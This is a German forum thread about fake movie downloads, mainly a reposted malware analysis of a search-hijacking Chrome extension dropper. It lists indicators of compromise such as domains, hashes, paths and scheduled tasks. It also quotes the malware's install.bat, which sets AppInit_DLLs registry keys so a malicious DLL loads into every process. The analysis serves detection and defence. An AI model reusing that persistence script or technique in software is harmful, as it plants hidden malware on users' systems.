Das wichtigste fehlt wieder: wie? 
Ich schätze kaum beim entpacken von Zip/Rar Dateien, die kein .exe Archiv sind, oder beim schauen der Videodatei.
Wer so blöd ist eine .exe aus einer ohnehin illegalen Quelle zu starten, ist aber auch selber schuld! Alleine durch daß schauen des Films (.avi, .mkv etc.) wird keine Schadsoftware installiert! Und entpacken eines Archivs führt man immer über ein sicheres Programm durch (7zip, WinRAR etc.)!
Ist halt voll Klickbay der Titel. Bildzeitung ist nun Underground geworden 
Wie hier schon erwähnt, fehlt eigentlich das wichtigste.
Wie soll das Passieren.
Es wird erwähnt, das Leute, die den Film auf Twitter angesehen haben die Malware haben.
Wie ist das bitte Passiert, drive-by-download der Malware oder was ist da passiert ?
Ein Neuer Unbekannter Exploit innerhalb der Browser Video Software ?
Eigentlich schade.
Search-Hijacker-Erweiterung
Film:
Top Gun: Maverick-
Dreieck der Traurigkeit
An der Westfront ist es ruhig
Super Mario Bros.
Dateinamen:
hd1080ptop gun maverick.exe
Dreieck der Traurigkeit 2022.exe
Untertitel Dreieck.of.Sadness.2022.1080p.webrip…exe
all.quiet.on.the.western.front.2022.1080p.nf.we… (1) .exe
\the banshees of inisherin (2022) [1080p] [webrip] [5.1] [yts.mx]\subtitle
SHA-1: 426f48491e5e7146ce0e43397c7cc3513a1706e7
Eine weit verbreitete Malware, die in Download-Portalen zu finden ist, liefert eine persistente bösartige Erweiterung. Obwohl die Trojaner-Datei die Form eines Raubkopien-Filmdownloads hat, installiert sie nur Schadsoftware und keine Filme. Die Persistenz wird erreicht, indem in den Registrierungsschlüssel appinit_dlls geschrieben wird – der Dateipfad der schädlichen DLL, die im temporären Ordner abgelegt wird. Mit appinit_dlls wird die DLL in alle Prozesse geladen, die die user32.dll laden .
Die schädliche Erweiterung wird nicht im Chrome Web Store veröffentlicht, sondern lokal in einem temporären Ordner installiert. Es wird oft „GoogleDoc“ oder „App“ genannt und übernimmt die Suchmaschine. Die Zahl der Opfer ist schwer zu messen, da die Erweiterung nicht im Chrome Store verfügbar ist, aber mehr als 50.000 sind vor dieser Bedrohung geschützt.
Der Trojaner erreicht ein dauerhaftes Laden der Erweiterung bei jedem Browserstart, indem er den Browser-Link ändert und zusätzliche Befehlszeilenparameter hinzufügt, die den Browser anweisen, auch eine lokale Erweiterung zu laden:
Hijacker:
Das Installationsprogramm beendet alle Browserprozesse ĂĽber WMI und legt DLLs und Erweiterungsdateien auf der Festplatte im Ordner %userprofile%\appdata\local\windowsapp ab .
Anschließend wird cmd.exe ausgeführt, um das Skript „install.bat“ auszuführen, das mithilfe der Registrierungsschlüssel appinit_dlls Persistenz hinzufügt . Dadurch wird die schädliche DLL geladen, die ebenfalls in ihrem Ausführungsordner %userprofile%\appdata\local\windowsapp\ext.dll abgelegt wurde .
Hijacker:
Das Installationsprogramm enthält das Skript, die schädlichen Erweiterungsdateien und die DLL.
Hijacker:
Install.bat:
@echo off
set version=1.0
set base64=HKLM\SOFTWARE
set ext_dll=„%LocalAppdata%\WindowsApp\ext.dll“
REG ADD „%base64%\Microsoft\Windows NT\CurrentVersion\Windows“ /v „AppInit_DLLs“ /t REG_SZ /d %ext_dll% /f
REG ADD „%base64%\Microsoft\Windows NT\CurrentVersion\Windows“ /v „LoadAppInit_DLLs“ /t REG_DWORD /d 1 /f
Anhand der Manifestdatei können wir erkennen, dass etwas mit der Erweiterung nicht stimmt – sie nennt sich „Google Docs“ und erteilt sich selbst die vertraulichsten Berechtigungen:
Hijacker:
In den appext.dll-Strings können wir sehen, dass sie sich um die Installation und Persistenz der Erweiterung kümmert.
Hijacker:
IOCs - Beispiele für Identifikatoren für ausführbare Trojanerdateien – es gibt mehr Identifikatoren für jede Kategorie, aber wir führen hier die gängigsten auf:
Namen der Unterzeichner:
FTechnology Limited
LIMESTONE DIGITAL LIMITED
SYCE LTD
TEKVIVE LTD
TELIX LIMITED
Dateiherausgeber:
„Limestone“
„LimeStone Limited“
„DigitalApps“
„Apps“
Anzeigename:
„Smash“
„Install“
PDB-Pfad:
E:\work\chrome_extension_auto_install\SetupUnpackNewRealFixReload\ExtDll\x64\Release\ext.pdb
C:\Users\dsaxc\Desktop\InstallExtension\x64\Release\InstallExtension.pdb
Domänen:
Filesdownloader[.]one
Filedownloader[.]one
Filesdownloader[.]cloud
Filedownloader[.]cloud
Freefilesdownloads[.]wiki
Downloaderfiles[.]wiki
Getfiles[.]click
Getfiles[.]one
Downloadit[.]wiki
Thechivalro[. ]com
Adtwobrightsa[.]info
Die Dateien werden auch in Discord-Kanälen verbreitet - Suchmaschine:
Searchesmia[.]com
gosearches[.]gg
Erweiterungs-IDs zum Beispiel:
Macjkjgieeoakdlmmfefgmldohgddpkj
Jncffhgjbmpggpdflbbkhdghjipdbjkn
iglfjaeojcakllgbfalclepdncgidelo
Dateisystem:
c:\users\ user \appdata\local\windowsapp\chrome.bat
c:\users\ user \appdata\local\windowsapp\ext.dll
c:\users\ user \appdata\local\windowsapp\installextension. exe
c:\users\ user \appdata\local\serviceapp\installextension.exe
c:\users\ user \appdata\local\ServiceApp\Chrome.bat
c:\users\ user \appdata\local\ServiceApp\Edge.bat
c :\Benutzer\ Benutzer \appdata\local\ServiceApp\reg.bat
c:\Benutzer\ Benutzer \appdata\local\ServiceApp\reg.xml
c:\Benutzer\ Benutzer \appdata\local\ServiceApp\InstallExtension.exe
c:\ Benutzer\Benutzer \appdata\local\ServiceApp\apps-helper\apps.crx
c:\users\ Benutzer \appdata\local\SysWins\App.exe
c:\users\ Benutzer \appdata\local\ServApps\apps-helper\apps. crx
c:\users\ user \appdata\local\SystemConfigs\chrome.bat
c:\users\ user \appdata\local\SystemConfigs\app.exe
C:\users\ user \appdata\local\temp\test.exe
c :\windows\system32\sxsshell.dll
Beharrlichkeit:
Ăśber geplante Aufgabe:
„GoogleUpdate“
„Chromeupdatess“
„ChrUpdate“
SHA1s:
c79fb9d8fdbead904459bd9d1ffadf6ce43c9374
c9f952ad657bbf653c4f5c678778f1b8178f2912
caaa052ae05d6032d8361e61fa22a686c6b5a392
c1d3c4adc28eae2ff91f931b3efbfefe3da56c79
efe7798ad5c8d77f36cacdc1a65c22ca8792b09f
0ac6f926538c55664aaf314de620bf99d4ac49d3
cc688c7e0253a3b12a869dd2224fe351d1ce8b55
426f48491e5e7146ce0e43397c7cc3513a1706e7
eabe1a499a663b74d7b80fd0dec99b103d957697
caaa052ae05d6032d8361e61fa22a686c6b5a392
f134a96132867224b2e0a0a06a6e21714de859d7
83dbf1b2cc980b6f6f1075501d620bca1c8a476f
78af5cb37ed3e66d3c934f2d939635f585c4f782
56250e4ec01d71f2f5df4a0ecee1b0f1780dc283
5c2b7ce70223b56c4b7d5e50bbfb4254fcaac091
c79fb9d8fdbead904459bd9d1ffadf6ce43c9374
9ddaca27638db15427aca282b5a16c20eda6184e
0c4468151e311ae95b374e43d849f20ba9a450c3
364339d095 6766ac0b3e25ccda352f1596321fd4
(Quelle: reasonlabs.com)
Also mal ehrlich, die Zeiten von Readme.exe, wichtig.exe oder sonstigen AusfĂĽhrbaren Programmen war vor 20 Jahren.
Kein Verständnis für die Idioten, die sich irgendwelche Downloader.exe Programme runterladen um an Warez zu kommen.
Und dann Jammern, das sie sich irgendwas eingefangen haben.
Geschieht den leuten recht, wenn soetwas passiert.
Dummheit muss einfach Bestraft werden, und wenn man sich vor einer Aktion nicht etwas darĂĽber Informiert dann ist es halt so.
Das sind genau die leute, die sich auch eine „Zelda - TOTK.EXE“ Runterladen würden.
Und nachdem sie diesen Fehler schon begangen haben, die EXE noch einfach so Starten.
1 Like
Zitat „Obwohl die Trojaner-Datei die Form eines Raubkopien-Filmdownloads hat, installiert sie nur Schadsoftware und keine Filme.“
Ein echter Film-Download sieht aber eben ganz anders aus! Und Filme werden auch nicht installiert. Wie gesagt, Dummheit wird bestraft…
Mir sind ebenfalls keinerlei Dateiendungen von Filmen bekannt, die auf *.exe, *.dll, *.ini lauten! Die Tatsache, dass der adwCleaner den betroffenen PC / Browser wieder sauber bekommt, sagt ja schon aus, dass es sich hierbei nicht um einen hochkomplexen Trojaner handelt…!
Früher nannte man so etwas einfach „AdWare“. Ich denke auch, dass die Verteilung recht simpel über drive-by-download passiert. Vielleicht auch nur zur Zeit ein weiterer Feldtest, um größere Aktionen planbar / durchführbar zu machen…?!
